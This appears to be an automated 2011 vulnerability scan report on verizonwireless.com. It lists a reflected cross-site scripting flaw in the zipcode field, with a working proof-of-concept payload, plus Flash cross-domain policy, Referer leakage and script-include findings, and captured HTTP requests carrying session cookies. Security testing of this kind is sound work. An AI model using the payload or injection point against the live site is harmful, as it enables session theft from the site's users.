XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, verizonwireless.com

Report generated by XSS.CX at Wed Jul 13 10:21:47 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

2. Flash cross-domain policy

3. Cross-domain POST

4. Cross-domain Referer leakage

4.1. http://www.verizonwireless.com/b2c/explore/

4.2. http://www.verizonwireless.com/b2c/store/controller

5. Cross-domain script include

5.1. http://www.verizonwireless.com/b2c/a

5.2. http://www.verizonwireless.com/b2c/businessSolutions/index.jsp

5.3. http://www.verizonwireless.com/b2c/explore/

5.4. http://www.verizonwireless.com/b2c/store/controller

5.5. http://www.verizonwireless.com/b2c/vzwfly

6. TRACE method is enabled

7. Robots.txt file



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The value of the zipcode request parameter is copied into the HTML document as plain text between tags. The payload 60ca9<img%20src%3da%20onerror%3dalert(1)>1b49977c5e6 was submitted in the zipcode parameter. This input was echoed as 60ca9<img src=a onerror=alert(1)>1b49977c5e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

POST /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewShopIndex
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4f58455e445a4a420000; mbox=session#1310569554435-90226#1310571551|PC#1310569554435-90226.17#1311779291|check#true#1310569751; gnVersion=2011Jul12104957; mybizCookie=true; CP=null*; SESSION_VALUE=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1!1310569551080; TIME_CHECKER=1310569589129; __utma=96859928.1761841238.1310569615.1310569615.1310569615.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1310569615.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; OC=false%7C%7C%20%7C%7C; chkcookie=1310569697006
Content-Type: application/x-www-form-urlencoded
Content-Length: 176

query=item%3DphoneFirst%26action%3DviewShopIndex%26go%3D%2Fstore%2Fcontroller%26&fd=&go=%2Fstore%2Fcontroller&zipcode=60ca9<img%20src%3da%20onerror%3dalert(1)>1b49977c5e6&rememberMyZip=&state=DE&prevstate=&change=changed&filter=

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 13 Jul 2011 15:09:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 24459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                                       <html xmlns="http://www.w3.org/
...[SNIP]...
<div id="error" class="errorText">
           We currently do not have service for zip code 60ca9<img src=a onerror=alert(1)>1b49977c5e6. If you would like to choose a location by a different zip code please enter it now, or choose a location by city/state. You can also use <a href="/b2c/CoverageLocatorController?requesttype=NEWREQUEST
...[SNIP]...

2. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verizonwireless.com

Response

HTTP/1.1 200 OK
Server: None
Date: Wed, 13 Jul 2011 15:06:13 GMT
Content-type: text/xml
Last-modified: Tue, 14 Apr 2009 18:25:47 GMT
Content-length: 786
Etag: "312-49e4d52b"
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vzwcorp.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.vzw.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizon.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizonwireless.com" secure="false" to-ports="*" />
...[SNIP]...

3. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/businessSolutions/index.jsp

Issue detail

The page contains a form which POSTs data to the domain enterprisecenter.verizon.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /b2c/businessSolutions/index.jsp HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4f58455e445a4a420000; mbox=check#true#1310569615|session#1310569554435-90226#1310571415|PC#1310569554435-90226.17#1311779159; gnVersion=2011Jul12104957

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 13 Jul 2011 15:06:13 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 23215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lan
...[SNIP]...
<div class="login_content hidden">
           <form name="vzeForm" id="vzeForm" method="post" action="https://EnterpriseCenter.verizon.com/enterprisesolutions/Default/login.fcc">
                   <div class="fixer_10">
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://www.verizonwireless.com/b2c/explore/  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/explore/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/explore/?page=why-verizon&section=verizon-4g-lte HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4f58455e445a4a420000; mbox=session#1310569554435-90226#1310571752|PC#1310569554435-90226.17#1311779492|check#true#1310569952; gnVersion=2011Jul12104957; mybizCookie=true; CP=null*; SESSION_VALUE=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1!1310569551080; TIME_CHECKER=1310569589129; __utma=96859928.1761841238.1310569615.1310569615.1310569615.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1310569615.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; OC=false%7C%7C%20%7C%7C; chkcookie=1310569963275

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 13 Jul 2011 15:13:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 23776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xm
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/splashPageDB.js"></script>    
   <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/populateJSONWidgets.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/db.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/populateJSONPhoneFeature.js"></script>
...[SNIP]...
</script>
   
   
       <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/s11.css" />
   <script type="text/javascript" src="http://cache.vzw.com/scripts/s11.js"></script>
...[SNIP]...
</div>
       <a class="arrowLink" href="http://b2b.vzw.com/international/Global_Travel/index.html">Learn About Global Travel Program</a>
...[SNIP]...
</p>
           <a class="arrowLink" href="http://aboutus.vzw.com/aboutusoverview.html">Learn More About Verizon Wireless</a>
...[SNIP]...
<br />
               <a class="arrowLink" href="http://www.twitter.com/VerizonWireless" onclick="popUp(this.href, 'fullScreen'); return false;">Follow Us on Twitter</a>
...[SNIP]...
<br />
<a class="arrowLink" href="http://www.facebook.com/verizon" onclick="popUp(this.href, 'fullScreen'); return false;">Follow Us on Facebook</a>
...[SNIP]...
<br />
               <a class="arrowLink" href="http://www.youtube.com/verizonwireless" onclick="popUp(this.href, 'fullScreen'); return false;">Watch Us on YouTube</a>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

4.2. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=12&lid=//global//shop//phones+and+devices//tablets HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/explore/
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4f58455e445a4a420000; mbox=check#true#1310569668|session#1310569554435-90226#1310571468|PC#1310569554435-90226.17#1311779208; gnVersion=2011Jul12104957; mybizCookie=true; CP=null*; SESSION_VALUE=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1!1310569551080; TIME_CHECKER=1310569589129; __utma=96859928.1761841238.1310569615.1310569615.1310569615.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1310569615.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; OC=false%7C%7C%20%7C%7C; chkcookie=1310569617898

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 13 Jul 2011 15:08:10 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 20805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                                       <html xmlns="http://www.w3.org/
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/layout.css" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/fonts.css" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/ecom.css" />
   
   
               <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="https://scache.vzw.com/globalnav/css/globalnav-js.css" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="https://scache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="https://scache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="https://scache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 5 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.verizonwireless.com/b2c/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/a HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/vzwfly
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4f58455e445a4a420000; mbox=session#1310569554435-90226#1310571641|PC#1310569554435-90226.17#1311779381|check#true#1310569841; gnVersion=2011Jul12104957; mybizCookie=true; CP=null*; SESSION_VALUE=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1!1310569551080; TIME_CHECKER=1310569589129; __utma=96859928.1761841238.1310569615.1310569615.1310569615.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1310569615.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; OC=false%7C%7C%20%7C%7C; chkcookie=1310569786409

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 13 Jul 2011 15:10:10 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
